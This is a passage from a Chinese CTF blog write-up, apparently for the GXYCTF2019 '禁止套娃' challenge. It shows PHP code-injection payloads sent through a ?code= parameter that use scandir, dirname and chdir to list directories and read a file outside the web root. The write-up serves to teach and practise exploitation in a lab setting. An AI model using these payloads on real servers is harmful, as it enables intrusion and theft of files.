<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?code=var_dump(getcwd());</span><br><span class="line"><span class="keyword">string</span>(<span class="number">13</span>) <span class="string">&quot;/var/www/html&quot;</span></span><br></pre></td></tr></table></figure>

<p>那么怎么进行当前目录的目录遍历呢？</p>
<p>这里用<code>scandir()</code>即可</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?code=var_dump(scandir(getcwd()));</span><br><span class="line"><span class="keyword">array</span>(<span class="number">3</span>) &#123; [<span class="number">0</span>]=&gt; <span class="keyword">string</span>(<span class="number">1</span>) <span class="string">&quot;.&quot;</span> [<span class="number">1</span>]=&gt; <span class="keyword">string</span>(<span class="number">2</span>) <span class="string">&quot;..&quot;</span> [<span class="number">2</span>]=&gt; <span class="keyword">string</span>(<span class="number">9</span>) <span class="string">&quot;index.php&quot;</span> &#125;</span><br></pre></td></tr></table></figure>

<p>那么既然不在这一层目录，如何进行目录上跳呢？</p>
<p>我们用<code>dirname()</code>即可</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?code=var_dump(scandir(dirname(getcwd())));</span><br><span class="line"><span class="keyword">array</span>(<span class="number">4</span>) &#123; [<span class="number">0</span>]=&gt; <span class="keyword">string</span>(<span class="number">1</span>) <span class="string">&quot;.&quot;</span> [<span class="number">1</span>]=&gt; <span class="keyword">string</span>(<span class="number">2</span>) <span class="string">&quot;..&quot;</span> [<span class="number">2</span>]=&gt; <span class="keyword">string</span>(<span class="number">14</span>) <span class="string">&quot;flag_phpbyp4ss&quot;</span> [<span class="number">3</span>]=&gt; <span class="keyword">string</span>(<span class="number">4</span>) <span class="string">&quot;html&quot;</span> &#125;</span><br></pre></td></tr></table></figure>

<p>那么怎么更改我们的当前目录呢？这里我们发现有函数可以更改当前目录</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chdir ( <span class="keyword">string</span> $directory ) : <span class="keyword">bool</span></span><br></pre></td></tr></table></figure>

<p>将 PHP 的当前目录改为 directory。</p>
<p>所以我们这里在</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dirname(getcwd())</span><br></pre></td></tr></table></figure>

<p>进行如下设置即可</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chdir(dirname(getcwd()))</span><br></pre></td></tr></table></figure>

<p>我们尝试读取<code>/var/www/123</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//localhost/?code=readfile(next(array_reverse(scandir(dirname(chdir(dirname(getcwd())))))));</span></span><br></pre></td></tr></table></figure>

<p>即可进行文件读取</p>

    </div>

    
    
    
      <div>
      
        <div>
    
        <div style="text-align:center;color: #66ccff;font-size:14px;">-EOF-</div>
    
</div>
      
      </div>
      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/WEB/" rel="tag"># WEB</a>
              <a href="/tags/CTF/" rel="tag"># CTF</a>
              <a href="/tags/BUUCTF/" rel="tag"># BUUCTF</a>
              <a href="/tags/PHP/" rel="tag"># PHP</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/04/27/escapeshell&escapecmd%E6%BC%8F%E6%B4%9E/" rel="prev" title="php中的escapeshellarg+escapeshellcmd漏洞">
      <i class="fa fa-chevron-left"></i> php中的escapeshellarg+escapeshellcmd漏洞
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/09/14/%E4%BC%98%E9%9B%85%E5%9C%B0%E4%BD%BF%E7%94%A8%20minecraft%20%E5%AE%98%E6%96%B9%20server%20+%20PCL2%20%E8%81%94%E6%9C%BA%E6%B8%B8%E6%88%8F/" rel="next" title="优雅地使用 minecraft 官方 server + PCL2 联机游戏">
      优雅地使用 minecraft 官方 server + PCL2 联机游戏 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%97%A0%E5%8F%82%E6%95%B0%E5%87%BD%E6%95%B0RCE-GXYCTF2019-%E7%A6%81%E6%AD%A2%E5%A5%97%E5%A8%83"><span class="nav-number">1.</span> <span class="nav-text">无参数函数RCE - [GXYCTF2019]禁止套娃</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%80%9D%E8%B7%AF"><span class="nav-number">1.1.</span> <span class="nav-text">思路</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#payload%E6%9E%84%E9%80%A0"><span class="nav-number">1.2.</span> <span class="nav-text">payload构造</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%96%E7%95%8C%E7%BA%BF%E4%BA%8C"><span class="nav-number">1.3.</span> <span class="nav-text">世界线二</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#More-about-RCE"><span class="nav-number">1.4.</span> <span class="nav-text">More about RCE</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E6%97%A0%E5%8F%82%E6%95%B0%E5%87%BD%E6%95%B0RCE"><span class="nav-number">1.4.1.</span> <span class="nav-text">什么是无参数函数RCE</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B3%951%EF%BC%9Agetenv"><span class="nav-number">1.4.2.</span> <span class="nav-text">法1：getenv()</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B3%95%E4%BA%8C%EF%BC%9Agetallheaders"><span class="nav-number">1.4.3.</span> <span class="nav-text">法二：getallheaders()</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B3%95%E4%B8%89%EF%BC%9Aget-defined-vars"><span class="nav-number">1.4.4.</span> <span class="nav-text">法三：get_defined_vars()</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B3%95%E5%9B%9B%EF%BC%9Asession-id"><span class="nav-number">1.4.5.</span> <span class="nav-text">法四：session_id()</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B3%95%E4%BA%94%EF%BC%9Adirname-amp-chdir"><span class="nav-number">1.4.6.</span> <span class="nav-text">法五：dirname() &amp; chdir()</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="NoahTie"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">NoahTie</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">13</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">16</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/noahtie" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;noahtie" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:noahtie@foxmail.com" title="E-Mail → mailto:noahtie@foxmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="http://wpa.qq.com/msgrd?v=3&uin=571364304&site=qq&menu=yes" title="QQ → http:&#x2F;&#x2F;wpa.qq.com&#x2F;msgrd?v&#x3D;3&amp;uin&#x3D;571364304&amp;site&#x3D;qq&amp;menu&#x3D;yes" rel="noopener" target="_blank"><i class="fab fa-qq fa-fw"></i>QQ</a>
      </span>
  </div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      友链
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://www.wootec.top/" title="https:&#x2F;&#x2F;www.wootec.top" rel="noopener" target="_blank">Reverier's Blog</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2020 – 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">NoahTie</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://mist.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a> 强力驱动
  </div><script color="0,0,255" opacity="0.5" zIndex="-1" count="99" src="https://cdn.jsdelivr.net/npm/canvas-nest.js@1/dist/canvas-nest.js"></script>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : false,
      appId      : 'Cd1LV9Hip0zo9XBt7rBn6Yqs-MdYXbMMI',
      appKey     : 'yM4hszYa7RMP9zzL3C0t41P1',
      placeholder: "Just go go",
      avatar     : 'monsterid',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : true,
      lang       : 'zh-cn' || 'zh-cn',
      path       : location.pathname,
      recordIP   : true,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"log":false,"model":{"jsonPath":"/live2dw/assets/shizuku.model.json"},"display":{"position":"right","width":300,"height":600},"mobile":{"show":true,"scale":0.25}});</script></body>
</html>

